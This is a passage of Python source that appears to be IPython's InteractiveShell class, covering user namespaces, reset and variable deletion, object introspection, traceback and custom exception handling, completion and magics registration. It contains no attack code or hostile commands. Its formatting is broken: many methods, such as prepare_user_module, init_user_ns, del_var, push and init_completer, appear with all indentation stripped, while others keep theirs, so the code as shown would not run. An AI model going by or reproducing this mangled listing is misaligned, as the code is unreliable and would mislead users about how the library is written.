        self.InteractiveTB.debugger(force=True)
#-------------------------------------------------------------------------
# Things related to IPython's various namespaces
#-------------------------------------------------------------------------
    # True until a caller (e.g. an embedding application) supplies its own
    # user_module/user_ns in init_create_namespaces.
    default_user_namespaces = True

    def init_create_namespaces(self, user_module=None, user_ns=None):
        """Create ``user_module``/``user_ns`` plus related namespace tables.

        Either argument may be supplied by an embedding caller; supplying one
        clears ``default_user_namespaces``.
        """
        # Create the namespace where the user will operate.  user_ns is
        # normally the only one used, and it is passed to the exec calls as
        # the locals argument.  But we do carry a user_global_ns namespace
        # given as the exec 'globals' argument,  This is useful in embedding
        # situations where the ipython shell opens in a context where the
        # distinction between locals and globals is meaningful.  For
        # non-embedded contexts, it is just the same object as the user_ns dict.

        # FIXME. For some strange reason, __builtins__ is showing up at user
        # level as a dict instead of a module. This is a manual fix, but I
        # should really track down where the problem is coming from. Alex
        # Schmolck reported this problem first.

        # A useful post by Alex Martelli on this topic:
        # Re: inconsistent value from __builtins__
        # Von: Alex Martelli <aleaxit@yahoo.com>
        # Datum: Freitag 01 Oktober 2004 04:45:34 nachmittags/abends
        # Gruppen: comp.lang.python

        # Michael Hohn <hohn@hooknose.lbl.gov> wrote:
        # > >>> print type(builtin_check.get_global_binding('__builtins__'))
        # > <type 'dict'>
        # > >>> print type(__builtins__)
        # > <type 'module'>
        # > Is this difference in return value intentional?

        # Well, it's documented that '__builtins__' can be either a dictionary
        # or a module, and it's been that way for a long time. Whether it's
        # intentional (or sensible), I don't know. In any case, the idea is
        # that if you need to access the built-in namespace directly, you
        # should start with "import __builtin__" (note, no 's') which will
        # definitely give you a module. Yeah, it's somewhat confusing:-(.

        # These routines return a properly built module and dict as needed by
        # the rest of the code, and can also be used by extension writers to
        # generate properly initialized namespaces.
        if (user_ns is not None) or (user_module is not None):
            self.default_user_namespaces = False
        self.user_module, self.user_ns = self.prepare_user_module(user_module, user_ns)

        # A record of hidden variables we have added to the user namespace, so
        # we can list later only variables defined in actual interactive use.
        self.user_ns_hidden = {}

        # Now that FakeModule produces a real module, we've run into a nasty
        # problem: after script execution (via %run), the module where the user
        # code ran is deleted.  Now that this object is a true module (needed
        # so doctest and other tools work correctly), the Python module
        # teardown mechanism runs over it, and sets to None every variable
        # present in that module.  Top-level references to objects from the
        # script survive, because the user_ns is updated with them.  However,
        # calling functions defined in the script that use other things from
        # the script will fail, because the function's closure had references
        # to the original objects, which are now all None.  So we must protect
        # these modules from deletion by keeping a cache.
        #
        # To avoid keeping stale modules around (we only need the one from the
        # last run), we use a dict keyed with the full path to the script, so
        # only the last version of the module is held in the cache.  Note,
        # however, that we must cache the module *namespace contents* (their
        # __dict__).  Because if we try to cache the actual modules, old ones
        # (uncached) could be destroyed while still holding references (such as
        # those held by GUI objects that tend to be long-lived)>
        #
        # The %reset command will flush this cache.  See the cache_main_mod()
        # and clear_main_mod_cache() methods for details on use.

        # This is the cache used for 'main' namespaces
        self._main_mod_cache = {}

        # A table holding all the namespaces IPython deals with, so that
        # introspection facilities can search easily.
        self.ns_table = {'user_global':self.user_module.__dict__,
                         'user_local':self.user_ns,
                         'builtin':builtin_mod.__dict__
                         }
    @property
    def user_global_ns(self):
        """The 'global' user namespace: the user module's __dict__."""
        return self.user_module.__dict__
def prepare_user_module(self, user_module=None, user_ns=None):
"""Prepare the module and namespace in which user code will be run.
When IPython is started normally, both parameters are None: a new module
is created automatically, and its __dict__ used as the namespace.
If only user_module is provided, its __dict__ is used as the namespace.
If only user_ns is provided, a dummy module is created, and user_ns
becomes the global namespace. If both are provided (as they may be
when embedding), user_ns is the local namespace, and user_module
provides the global namespace.
Parameters
----------
user_module : module, optional
The current user module in which IPython is being run. If None,
a clean module will be created.
user_ns : dict, optional
A namespace in which to run interactive commands.
Returns
-------
A tuple of user_module and user_ns, each properly initialised.
"""
if user_module is None and user_ns is not None:
user_ns.setdefault("__name__", "__main__")
user_module = DummyMod()
user_module.__dict__ = user_ns
if user_module is None:
user_module = types.ModuleType("__main__",
doc="Automatically created module for IPython interactive environment")
# We must ensure that __builtin__ (without the final 's') is always
# available and pointing to the __builtin__ *module*. For more details:
# http://mail.python.org/pipermail/python-dev/2001-April/014068.html
user_module.__dict__.setdefault('__builtin__', builtin_mod)
user_module.__dict__.setdefault('__builtins__', builtin_mod)
if user_ns is None:
user_ns = user_module.__dict__
return user_module, user_ns
    def init_sys_modules(self):
        """Register the user module in sys.modules under its own name."""
        # We need to insert into sys.modules something that looks like a
        # module but which accesses the IPython namespace, for shelve and
        # pickle to work interactively. Normally they rely on getting
        # everything out of __main__, but for embedding purposes each IPython
        # instance has its own private namespace, so we can't go shoving
        # everything into __main__.

        # note, however, that we should only do this for non-embedded
        # ipythons, which really mimic the __main__.__dict__ with their own
        # namespace.  Embedded instances, on the other hand, should not do
        # this because they need to manage the user local/global namespaces
        # only, but they live within a 'normal' __main__ (meaning, they
        # shouldn't overtake the execution environment of the script they're
        # embedded in).

        # This is overridden in the InteractiveShellEmbed subclass to a no-op.
        main_name = self.user_module.__name__
        sys.modules[main_name] = self.user_module
def init_user_ns(self):
"""Initialize all user-visible namespaces to their minimum defaults.
Certain history lists are also initialized here, as they effectively
act as user namespaces.
Notes
-----
All data structures here are only filled in, they are NOT reset by this
method. If they were not empty before, data will simply be added to
them.
"""
# This function works in two parts: first we put a few things in
# user_ns, and we sync that contents into user_ns_hidden so that these
# initial variables aren't shown by %who. After the sync, we add the
# rest of what we *do* want the user to see with %who even on a new
# session (probably nothing, so they really only see their own stuff)
# The user dict must *always* have a __builtin__ reference to the
# Python standard __builtin__ namespace, which must be imported.
# This is so that certain operations in prompt evaluation can be
# reliably executed with builtins. Note that we can NOT use
# __builtins__ (note the 's'), because that can either be a dict or a
# module, and can even mutate at runtime, depending on the context
# (Python makes no guarantees on it). In contrast, __builtin__ is
# always a module object, though it must be explicitly imported.
# For more details:
# http://mail.python.org/pipermail/python-dev/2001-April/014068.html
ns = {}
# make global variables for user access to the histories
ns['_ih'] = self.history_manager.input_hist_parsed
ns['_oh'] = self.history_manager.output_hist
ns['_dh'] = self.history_manager.dir_hist
# user aliases to input and output histories. These shouldn't show up
# in %who, as they can have very large reprs.
ns['In'] = self.history_manager.input_hist_parsed
ns['Out'] = self.history_manager.output_hist
# Store myself as the public api!!!
ns['get_ipython'] = self.get_ipython
ns['exit'] = self.exiter
ns['quit'] = self.exiter
# Sync what we've added so far to user_ns_hidden so these aren't seen
# by %who
self.user_ns_hidden.update(ns)
# Anything put into ns now would show up in %who. Think twice before
# putting anything here, as we really want %who to show the user their
# stuff, not our variables.
# Finally, update the real user's namespace
self.user_ns.update(ns)
@property
def all_ns_refs(self):
"""Get a list of references to all the namespace dictionaries in which
IPython might store a user-created object.
Note that this does not include the displayhook, which also caches
objects from the output."""
return [self.user_ns, self.user_global_ns, self.user_ns_hidden] + \
[m.__dict__ for m in self._main_mod_cache.values()]
    def reset(self, new_session=True, aggressive=False):
        """Clear all internal namespaces, and attempt to release references to
        user objects.

        If new_session is True, a new history session will be opened.

        If aggressive is True, additionally cull sys.modules entries added
        since the ``_sys_modules_keys`` snapshot was taken (multiprocessing
        modules are kept); prints a message if no snapshot exists.
        """
        # Clear histories
        self.history_manager.reset(new_session)
        # Reset counter used to index all histories
        if new_session:
            self.execution_count = 1

        # Reset last execution result
        self.last_execution_succeeded = True
        self.last_execution_result = None

        # Flush cached output items
        if self.displayhook.do_full_cache:
            self.displayhook.flush()

        # The main execution namespaces must be cleared very carefully,
        # skipping the deletion of the builtin-related keys, because doing so
        # would cause errors in many object's __del__ methods.
        if self.user_ns is not self.user_global_ns:
            self.user_ns.clear()
        ns = self.user_global_ns
        drop_keys = set(ns.keys())
        drop_keys.discard('__builtin__')
        drop_keys.discard('__builtins__')
        drop_keys.discard('__name__')
        for k in drop_keys:
            del ns[k]

        self.user_ns_hidden.clear()

        # Restore the user namespaces to minimal usability
        self.init_user_ns()
        if aggressive and not hasattr(self, "_sys_modules_keys"):
            print("Cannot restore sys.module, no snapshot")
        elif aggressive:
            print("culling sys module...")
            current_keys = set(sys.modules.keys())
            for k in current_keys - self._sys_modules_keys:
                # multiprocessing machinery must survive the cull
                if k.startswith("multiprocessing"):
                    continue
                del sys.modules[k]

        # Restore the default and user aliases
        self.alias_manager.clear_aliases()
        self.alias_manager.init_aliases()

        # Now define aliases that only make sense on the terminal, because they
        # need direct access to the console in a way that we can't emulate in
        # GUI or web frontend
        if os.name == 'posix':
            for cmd in ('clear', 'more', 'less', 'man'):
                if cmd not in self.magics_manager.magics['line']:
                    self.alias_manager.soft_define_alias(cmd, cmd)

        # Flush the private list of module references kept for script
        # execution protection
        self.clear_main_mod_cache()
def del_var(self, varname, by_name=False):
"""Delete a variable from the various namespaces, so that, as
far as possible, we're not keeping any hidden references to it.
Parameters
----------
varname : str
The name of the variable to delete.
by_name : bool
If True, delete variables with the given name in each
namespace. If False (default), find the variable in the user
namespace, and delete references to it.
"""
if varname in ('__builtin__', '__builtins__'):
raise ValueError("Refusing to delete %s" % varname)
ns_refs = self.all_ns_refs
if by_name: # Delete by name
for ns in ns_refs:
try:
del ns[varname]
except KeyError:
pass
else: # Delete by object
try:
obj = self.user_ns[varname]
except KeyError:
raise NameError("name '%s' is not defined" % varname)
# Also check in output history
ns_refs.append(self.history_manager.output_hist)
for ns in ns_refs:
to_delete = [n for n, o in ns.items() if o is obj]
for name in to_delete:
del ns[name]
# Ensure it is removed from the last execution result
if self.last_execution_result.result is obj:
self.last_execution_result = None
# displayhook keeps extra references, but not in a dictionary
for name in ('_', '__', '___'):
if getattr(self.displayhook, name) is obj:
setattr(self.displayhook, name, None)
def reset_selective(self, regex=None):
"""Clear selective variables from internal namespaces based on a
specified regular expression.
Parameters
----------
regex : string or compiled pattern, optional
A regular expression pattern that will be used in searching
variable names in the users namespaces.
"""
if regex is not None:
try:
m = re.compile(regex)
except TypeError:
raise TypeError('regex must be a string or compiled pattern')
# Search for keys in each namespace that match the given regex
# If a match is found, delete the key/value pair.
for ns in self.all_ns_refs:
for var in ns:
if m.search(var):
del ns[var]
def push(self, variables, interactive=True):
"""Inject a group of variables into the IPython user namespace.
Parameters
----------
variables : dict, str or list/tuple of str
The variables to inject into the user's namespace. If a dict, a
simple update is done. If a str, the string is assumed to have
variable names separated by spaces. A list/tuple of str can also
be used to give the variable names. If just the variable names are
give (list/tuple/str) then the variable values looked up in the
callers frame.
interactive : bool
If True (default), the variables will be listed with the ``who``
magic.
"""
vdict = None
# We need a dict of name/value pairs to do namespace updates.
if isinstance(variables, dict):
vdict = variables
elif isinstance(variables, (str, list, tuple)):
if isinstance(variables, str):
vlist = variables.split()
else:
vlist = variables
vdict = {}
cf = sys._getframe(1)
for name in vlist:
try:
vdict[name] = eval(name, cf.f_globals, cf.f_locals)
except:
print('Could not get variable %s from %s' %
(name,cf.f_code.co_name))
else:
raise ValueError('variables must be a dict/str/list/tuple')
# Propagate variables to user namespace
self.user_ns.update(vdict)
# And configure interactive visibility
user_ns_hidden = self.user_ns_hidden
if interactive:
for name in vdict:
user_ns_hidden.pop(name, None)
else:
user_ns_hidden.update(vdict)
def drop_by_id(self, variables):
"""Remove a dict of variables from the user namespace, if they are the
same as the values in the dictionary.
This is intended for use by extensions: variables that they've added can
be taken back out if they are unloaded, without removing any that the
user has overwritten.
Parameters
----------
variables : dict
A dictionary mapping object names (as strings) to the objects.
"""
for name, obj in variables.items():
if name in self.user_ns and self.user_ns[name] is obj:
del self.user_ns[name]
self.user_ns_hidden.pop(name, None)
#-------------------------------------------------------------------------
# Things related to object introspection
#-------------------------------------------------------------------------
    def _ofind(self, oname, namespaces=None):
        """Find an object in the available namespaces.

        self._ofind(oname) -> dict with keys: found,obj,ospace,ismagic

        Has special code to detect magic functions.
        """
        oname = oname.strip()
        # Bail out early unless oname is a dotted identifier path or an
        # escaped magic name (%... / %%...).
        if not oname.startswith(ESC_MAGIC) and \
            not oname.startswith(ESC_MAGIC2) and \
            not all(a.isidentifier() for a in oname.split(".")):
            return {'found': False}

        if namespaces is None:
            # Namespaces to search in:
            # Put them in a list. The order is important so that we
            # find things in the same order that Python finds them.
            namespaces = [ ('Interactive', self.user_ns),
                           ('Interactive (global)', self.user_global_ns),
                           ('Python builtin', builtin_mod.__dict__),
                           ]

        ismagic = False
        isalias = False
        found = False
        ospace = None
        parent = None
        obj = None

        # Look for the given name by splitting it in parts.  If the head is
        # found, then we look for all the remaining parts as members, and only
        # declare success if we can find them all.
        oname_parts = oname.split('.')
        oname_head, oname_rest = oname_parts[0],oname_parts[1:]
        for nsname,ns in namespaces:
            try:
                obj = ns[oname_head]
            except KeyError:
                continue
            else:
                for idx, part in enumerate(oname_rest):
                    try:
                        parent = obj
                        # The last part is looked up in a special way to avoid
                        # descriptor invocation as it may raise or have side
                        # effects.
                        if idx == len(oname_rest) - 1:
                            obj = self._getattr_property(obj, part)
                        else:
                            obj = getattr(obj, part)
                    except:
                        # Blanket except b/c some badly implemented objects
                        # allow __getattr__ to raise exceptions other than
                        # AttributeError, which then crashes IPython.
                        break
                else:
                    # If we finish the for loop (no break), we got all members
                    found = True
                    ospace = nsname
                    break  # namespace loop

        # Try to see if it's magic
        if not found:
            obj = None
            if oname.startswith(ESC_MAGIC2):
                oname = oname.lstrip(ESC_MAGIC2)
                obj = self.find_cell_magic(oname)
            elif oname.startswith(ESC_MAGIC):
                oname = oname.lstrip(ESC_MAGIC)
                obj = self.find_line_magic(oname)
            else:
                # search without prefix, so run? will find %run?
                obj = self.find_line_magic(oname)
                if obj is None:
                    obj = self.find_cell_magic(oname)
            if obj is not None:
                found = True
                ospace = 'IPython internal'
                ismagic = True
                isalias = isinstance(obj, Alias)

        # Last try: special-case some literals like '', [], {}, etc:
        if not found and oname_head in ["''",'""','[]','{}','()']:
            obj = eval(oname_head)
            found = True
            ospace = 'Interactive'

        return {
                'obj':obj,
                'found':found,
                'parent':parent,
                'ismagic':ismagic,
                'isalias':isalias,
                'namespace':ospace
               }
@staticmethod
def _getattr_property(obj, attrname):
"""Property-aware getattr to use in object finding.
If attrname represents a property, return it unevaluated (in case it has
side effects or raises an error.
"""
if not isinstance(obj, type):
try:
# `getattr(type(obj), attrname)` is not guaranteed to return
# `obj`, but does so for property:
#
# property.__get__(self, None, cls) -> self
#
# The universal alternative is to traverse the mro manually
# searching for attrname in class dicts.
attr = getattr(type(obj), attrname)
except AttributeError:
pass
else:
# This relies on the fact that data descriptors (with both
# __get__ & __set__ magic methods) take precedence over
# instance-level attributes:
#
# class A(object):
# @property
# def foobar(self): return 123
# a = A()
# a.__dict__['foobar'] = 345
# a.foobar # == 123
#
# So, a property may be returned right away.
if isinstance(attr, property):
return attr
# Nothing helped, fall back.
return getattr(obj, attrname)
def _object_find(self, oname, namespaces=None):
"""Find an object and return a struct with info about it."""
return Struct(self._ofind(oname, namespaces))
def _inspect(self, meth, oname, namespaces=None, **kw):
"""Generic interface to the inspector system.
This function is meant to be called by pdef, pdoc & friends.
"""
info = self._object_find(oname, namespaces)
docformat = sphinxify if self.sphinxify_docstring else None
if info.found:
pmethod = getattr(self.inspector, meth)
# TODO: only apply format_screen to the plain/text repr of the mime
# bundle.
formatter = format_screen if info.ismagic else docformat
if meth == 'pdoc':
pmethod(info.obj, oname, formatter)
elif meth == 'pinfo':
pmethod(
info.obj,
oname,
formatter,
info,
enable_html_pager=self.enable_html_pager,
**kw
)
else:
pmethod(info.obj, oname)
else:
print('Object `%s` not found.' % oname)
return 'not found' # so callers can take other action
def object_inspect(self, oname, detail_level=0):
"""Get object info about oname"""
with self.builtin_trap:
info = self._object_find(oname)
if info.found:
return self.inspector.info(info.obj, oname, info=info,
detail_level=detail_level
)
else:
return oinspect.object_info(name=oname, found=False)
def object_inspect_text(self, oname, detail_level=0):
"""Get object info as formatted text"""
return self.object_inspect_mime(oname, detail_level)['text/plain']
def object_inspect_mime(self, oname, detail_level=0):
"""Get object info as a mimebundle of formatted representations.
A mimebundle is a dictionary, keyed by mime-type.
It must always have the key `'text/plain'`.
"""
with self.builtin_trap:
info = self._object_find(oname)
if info.found:
return self.inspector._get_info(info.obj, oname, info=info,
detail_level=detail_level
)
else:
raise KeyError(oname)
#-------------------------------------------------------------------------
# Things related to history management
#-------------------------------------------------------------------------
def init_history(self):
"""Sets up the command history, and starts regular autosaves."""
self.history_manager = HistoryManager(shell=self, parent=self)
self.configurables.append(self.history_manager)
#-------------------------------------------------------------------------
# Things related to exception handling and tracebacks (not debugging)
#-------------------------------------------------------------------------
debugger_cls = Pdb
    def init_traceback_handlers(self, custom_exceptions):
        """Create the syntax-error and interactive traceback handlers.

        Parameters
        ----------
        custom_exceptions : tuple
            ``(exc_tuple, handler)`` pair, forwarded unpacked to
            :meth:`set_custom_exc`.
        """
        # Syntax error handler.
        self.SyntaxTB = ultratb.SyntaxTB(color_scheme='NoColor', parent=self)
        # The interactive one is initialized with an offset, meaning we always
        # want to remove the topmost item in the traceback, which is our own
        # internal code. Valid modes: ['Plain','Context','Verbose','Minimal']
        self.InteractiveTB = ultratb.AutoFormattedTB(mode = 'Plain',
                                                     color_scheme='NoColor',
                                                     tb_offset = 1,
                                   check_cache=check_linecache_ipython,
                                   debugger_cls=self.debugger_cls, parent=self)
        # The instance will store a pointer to the system-wide exception hook,
        # so that runtime code (such as magics) can access it. This is because
        # during the read-eval loop, it may get temporarily overwritten.
        self.sys_excepthook = sys.excepthook
        # and add any custom exception handlers the user may have specified
        self.set_custom_exc(*custom_exceptions)
        # Set the exception mode (xmode trait: Plain/Context/Verbose/Minimal).
        self.InteractiveTB.set_mode(mode=self.xmode)
    def set_custom_exc(self, exc_tuple, handler):
        """set_custom_exc(exc_tuple, handler)

        Set a custom exception handler, which will be called if any of the
        exceptions in exc_tuple occur in the mainloop (specifically, in the
        run_code() method).

        Parameters
        ----------
        exc_tuple : tuple of exception classes
            A *tuple* of exception classes, for which to call the defined
            handler. It is very important that you use a tuple, and NOT A
            LIST here, because of the way Python's except statement works. If
            you only want to trap a single exception, use a singleton tuple::

                exc_tuple == (MyCustomException,)

        handler : callable
            handler must have the following signature::

                def my_handler(self, etype, value, tb, tb_offset=None):
                    ...
                    return structured_traceback

            Your handler must return a structured traceback (a list of strings),
            or None.

            This will be made into an instance method (via types.MethodType)
            of IPython itself, and it will be called if any of the exceptions
            listed in the exc_tuple are caught. If the handler is None, an
            internal basic one is used, which just prints basic info.

            To protect IPython from crashes, if your handler ever raises an
            exception or returns an invalid result, it will be immediately
            disabled.

        WARNING: by putting in your own exception handler into IPython's main
        execution loop, you run a very good chance of nasty crashes. This
        facility should only be used if you really know what you are doing."""

        if not isinstance(exc_tuple, tuple):
            raise TypeError("The custom exceptions must be given as a tuple.")

        # Fallback handler used when handler is None: prints basic info only.
        def dummy_handler(self, etype, value, tb, tb_offset=None):
            print('*** Simple custom exception handler ***')
            print('Exception type :', etype)
            print('Exception value:', value)
            print('Traceback :', tb)

        def validate_stb(stb):
            """validate structured traceback return type

            return type of CustomTB *should* be a list of strings, but allow
            single strings or None, which are harmless.

            This function will *always* return a list of strings,
            and will raise a TypeError if stb is inappropriate.
            """
            msg = "CustomTB must return list of strings, not %r" % stb
            if stb is None:
                return []
            elif isinstance(stb, str):
                return [stb]
            elif not isinstance(stb, list):
                raise TypeError(msg)
            # it's a list
            for line in stb:
                # check every element
                if not isinstance(line, str):
                    raise TypeError(msg)
            return stb

        if handler is None:
            wrapped = dummy_handler
        else:
            def wrapped(self,etype,value,tb,tb_offset=None):
                """wrap CustomTB handler, to protect IPython from user code

                This makes it harder (but not impossible) for custom exception
                handlers to crash IPython.
                """
                try:
                    stb = handler(self,etype,value,tb,tb_offset=tb_offset)
                    return validate_stb(stb)
                except:
                    # clear custom handler immediately, so a failure inside
                    # the handler cannot loop back into itself
                    self.set_custom_exc((), None)
                    print("Custom TB Handler failed, unregistering", file=sys.stderr)
                    # show the exception in handler first
                    stb = self.InteractiveTB.structured_traceback(*sys.exc_info())
                    print(self.InteractiveTB.stb2text(stb))
                    print("The original exception:")
                    stb = self.InteractiveTB.structured_traceback(
                        (etype,value,tb), tb_offset=tb_offset
                    )
                    return stb

        # Bind the wrapper as an instance method so handlers see the shell
        # as their ``self``.
        self.CustomTB = types.MethodType(wrapped,self)
        self.custom_exceptions = exc_tuple
    def excepthook(self, etype, value, tb):
        """One more defense for GUI apps that call sys.excepthook.

        GUI frameworks like wxPython trap exceptions and call
        sys.excepthook themselves. I guess this is a feature that
        enables them to keep running after exceptions that would
        otherwise kill their mainloop. This is a bother for IPython
        which expects to catch all of the program exceptions with a try:
        except: statement.

        Normally, IPython sets sys.excepthook to a CrashHandler instance, so if
        any app directly invokes sys.excepthook, it will look to the user like
        IPython crashed. In order to work around this, we can disable the
        CrashHandler and replace it with this excepthook instead, which prints a
        regular traceback using our InteractiveTB. In this fashion, apps which
        call sys.excepthook will generate a regular-looking exception from
        IPython, and the CrashHandler will only be triggered by real IPython
        crashes.

        This hook should be used sparingly, only in places which are not likely
        to be true IPython errors.
        """
        self.showtraceback((etype, value, tb), tb_offset=0)
def _get_exc_info(self, exc_tuple=None):
"""get exc_info from a given tuple, sys.exc_info() or sys.last_type etc.
Ensures sys.last_type,value,traceback hold the exc_info we found,
from whichever source.
raises ValueError if none of these contain any information
"""
if exc_tuple is None:
etype, value, tb = sys.exc_info()
else:
etype, value, tb = exc_tuple
if etype is None:
if hasattr(sys, 'last_type'):
etype, value, tb = sys.last_type, sys.last_value, \
sys.last_traceback
if etype is None:
raise ValueError("No exception to find")
# Now store the exception info in sys.last_type etc.
# WARNING: these variables are somewhat deprecated and not
# necessarily safe to use in a threaded environment, but tools
# like pdb depend on their existence, so let's set them. If we
# find problems in the field, we'll need to revisit their use.
sys.last_type = etype
sys.last_value = value
sys.last_traceback = tb
return etype, value, tb
def show_usage_error(self, exc):
"""Show a short message for UsageErrors
These are special exceptions that shouldn't show a traceback.
"""
print("UsageError: %s" % exc, file=sys.stderr)
def get_exception_only(self, exc_tuple=None):
"""
Return as a string (ending with a newline) the exception that
just occurred, without any traceback.
"""
etype, value, tb = self._get_exc_info(exc_tuple)
msg = traceback.format_exception_only(etype, value)
return ''.join(msg)
    def showtraceback(self, exc_tuple=None, filename=None, tb_offset=None,
                      exception_only=False, running_compiled_code=False):
        """Display the exception that just occurred.

        If nothing is known about the exception, this is the method which
        should be used throughout the code for presenting user tracebacks,
        rather than directly invoking the InteractiveTB object.

        A specific showsyntaxerror() also exists, but this method can take
        care of calling it if needed, so unless you are explicitly catching a
        SyntaxError exception, don't try to analyze the stack manually and
        simply call this method."""
        try:
            try:
                etype, value, tb = self._get_exc_info(exc_tuple)
            except ValueError:
                print('No traceback available to show.', file=sys.stderr)
                return
            if issubclass(etype, SyntaxError):
                # Though this won't be called by syntax errors in the input
                # line, there may be SyntaxError cases with imported code.
                self.showsyntaxerror(filename, running_compiled_code)
            elif etype is UsageError:
                self.show_usage_error(value)
            else:
                if exception_only:
                    stb = ['An exception has occurred, use %tb to see '
                           'the full traceback.\n']
                    stb.extend(self.InteractiveTB.get_exception_only(etype,
                                                                     value))
                else:
                    try:
                        # Exception classes can customise their traceback - we
                        # use this in IPython.parallel for exceptions occurring
                        # in the engines. This should return a list of strings.
                        stb = value._render_traceback_()
                    except Exception:
                        stb = self.InteractiveTB.structured_traceback(etype,
                                            value, tb, tb_offset=tb_offset)
                    self._showtraceback(etype, value, stb)
                    if self.call_pdb:
                        # drop into debugger
                        self.debugger(force=True)
                    # NOTE: the traceback was already shown just above; this
                    # early return skips the trailing _showtraceback call,
                    # which only serves the exception_only branch.
                    return
                # Actually show the traceback
                self._showtraceback(etype, value, stb)
        except KeyboardInterrupt:
            print('\n' + self.get_exception_only(), file=sys.stderr)
def _showtraceback(self, etype, evalue, stb):
"""Actually show a traceback.
Subclasses may override this method to put the traceback on a different
place, like a side channel.
"""
print(self.InteractiveTB.stb2text(stb))
    def showsyntaxerror(self, filename=None, running_compiled_code=False):
        """Display the syntax error that just occurred.

        This doesn't display a stack trace because there isn't one.

        If a filename is given, it is stuffed in the exception instead
        of what was there before (because Python's parser always uses
        "<string>" when reading from a string).

        If the syntax error occurred when running compiled code (i.e.
        running_compiled_code=True), a longer stack trace will be displayed.
        """
        etype, value, last_traceback = self._get_exc_info()
        if filename and issubclass(etype, SyntaxError):
            try:
                value.filename = filename
            except:
                # Not the format we expect; leave it alone
                # (blanket except: setting .filename on an arbitrary
                # exception object may fail in unexpected ways)
                pass
        # If the error occurred when executing compiled code, we should provide full stacktrace.
        elist = traceback.extract_tb(last_traceback) if running_compiled_code else []
        stb = self.SyntaxTB.structured_traceback(etype, value, elist)
        self._showtraceback(etype, value, stb)
# This is overridden in TerminalInteractiveShell to show a message about
# the %paste magic.
def showindentationerror(self):
"""Called by _run_cell when there's an IndentationError in code entered
at the prompt.
This is overridden in TerminalInteractiveShell to show a message about
the %paste magic."""
self.showsyntaxerror()
#-------------------------------------------------------------------------
# Things related to readline
#-------------------------------------------------------------------------
def init_readline(self):
"""DEPRECATED
Moved to terminal subclass, here only to simplify the init logic."""
# Set a number of methods that depend on readline to be no-op
warnings.warn('`init_readline` is no-op since IPython 5.0 and is Deprecated',
DeprecationWarning, stacklevel=2)
self.set_custom_completer = no_op
    @skip_doctest
    def set_next_input(self, s, replace=False):
        """ Sets the 'default' input string for the next command line.

        Example::

            In [1]: _ip.set_next_input("Hello Word")
            In [2]: Hello Word_  # cursor is here
        """
        # Store the text for the frontend to pick up when building the next
        # prompt. ``replace`` is accepted for API compatibility but is not
        # used in this base implementation.
        self.rl_next_input = s
def _indent_current_str(self):
"""return the current level of indentation as a string"""
return self.input_splitter.get_indent_spaces() * ' '
#-------------------------------------------------------------------------
# Things related to text completion
#-------------------------------------------------------------------------
def init_completer(self):
"""Initialize the completion machinery.
This creates completion machinery that can be used by client code,
either interactively in-process (typically triggered by the readline
library), programmatically (such as in test suites) or out-of-process
(typically over the network by remote frontends).
"""
from IPython.core.completer import IPCompleter
from IPython.core.completerlib import (module_completer,
magic_run_completer, cd_completer, reset_completer)
self.Completer = IPCompleter(shell=self,
namespace=self.user_ns,
global_namespace=self.user_global_ns,
parent=self,
)
self.configurables.append(self.Completer)
# Add custom completers to the basic ones built into IPCompleter
sdisp = self.strdispatchers.get('complete_command', StrDispatch())
self.strdispatchers['complete_command'] = sdisp
self.Completer.custom_completers = sdisp
self.set_hook('complete_command', module_completer, str_key = 'import')
self.set_hook('complete_command', module_completer, str_key = 'from')
self.set_hook('complete_command', module_completer, str_key = '%aimport')
self.set_hook('complete_command', magic_run_completer, str_key = '%run')
self.set_hook('complete_command', cd_completer, str_key = '%cd')
self.set_hook('complete_command', reset_completer, str_key = '%reset')
    @skip_doctest
    def complete(self, text, line=None, cursor_pos=None):
        """Return the completed text and a list of completions.

        Parameters
        ----------
        text : string
            A string of text to be completed on. It can be given as empty and
            instead a line/position pair are given. In this case, the
            completer itself will split the line like readline does.
        line : string, optional
            The complete line that text is part of.
        cursor_pos : int, optional
            The position of the cursor on the input line.

        Returns
        -------
        text : string
            The actual text that was completed.
        matches : list
            A sorted list with all possible completions.

        The optional arguments allow the completion to take more context into
        account, and are part of the low-level completion API.

        This is a wrapper around the completion mechanism, similar to what
        readline does at the command line when the TAB key is hit. By
        exposing it as a method, it can be used by other non-readline
        environments (such as GUIs) for text completion.

        Simple usage example::

            In [1]: x = 'hello'

            In [2]: _ip.complete('x.l')
            Out[2]: ('x.l', ['x.ljust', 'x.lower', 'x.lstrip'])
        """
        # Inject names into __builtin__ so we can complete on the added names.
        with self.builtin_trap:
            return self.Completer.complete(text, line, cursor_pos)
def set_custom_completer(self, completer, pos=0) -> None:
"""Adds a new custom completer function.
The position argument (defaults to 0) is the index in the completers
list where you want the completer to be inserted.
`completer` should have the following signature::
def completion(self: Completer, text: string) -> List[str]:
raise NotImplementedError
It will be bound to the current Completer instance and pass some text
and return a list with current completions to suggest to the user.
"""
newcomp = types.MethodType(completer, self.Completer)
self.Completer.custom_matchers.insert(pos,newcomp)
def set_completer_frame(self, frame=None):
"""Set the frame of the completer."""
if frame:
self.Completer.namespace = frame.f_locals
self.Completer.global_namespace = frame.f_globals
else:
self.Completer.namespace = self.user_ns
self.Completer.global_namespace = self.user_global_ns
#-------------------------------------------------------------------------
# Things related to magics
#-------------------------------------------------------------------------
    def init_magics(self):
        """Create the magics manager and register the built-in magics."""
        from IPython.core import magics as m
        self.magics_manager = magic.MagicsManager(shell=self,
                                   parent=self,
                                   user_magics=m.UserMagics(self))
        self.configurables.append(self.magics_manager)
        # Expose as public API from the magics manager
        self.register_magics = self.magics_manager.register
        self.register_magics(m.AutoMagics, m.BasicMagics, m.CodeMagics,
            m.ConfigMagics, m.DisplayMagics, m.ExecutionMagics,
            m.ExtensionMagics, m.HistoryMagics, m.LoggingMagics,
            m.NamespaceMagics, m.OSMagics, m.PackagingMagics,
            m.PylabMagics, m.ScriptMagics,
        )
        self.register_magics(m.AsyncMagics)
        # Register Magic Aliases
        mman = self.magics_manager
        # FIXME: magic aliases should be defined by the Magics classes
        # or in MagicsManager, not here
        mman.register_alias('ed', 'edit')
        mman.register_alias('hist', 'history')
        mman.register_alias('rep', 'recall')
        mman.register_alias('SVG', 'svg', 'cell')
        mman.register_alias('HTML', 'html', 'cell')
        mman.register_alias('file', 'writefile', 'cell')
        # FIXME: Move the color initialization to the DisplayHook, which
        # should be split into a prompt manager and displayhook. We probably
        # even need a centralize colors management object.
        self.run_line_magic('colors', self.colors)
    # Defined here so that it's included in the documentation
    @functools.wraps(magic.MagicsManager.register_function)
    def register_magic_function(self, func, magic_kind='line', magic_name=None):
        # Thin passthrough to the magics manager; functools.wraps surfaces
        # MagicsManager.register_function's signature and docstring here.
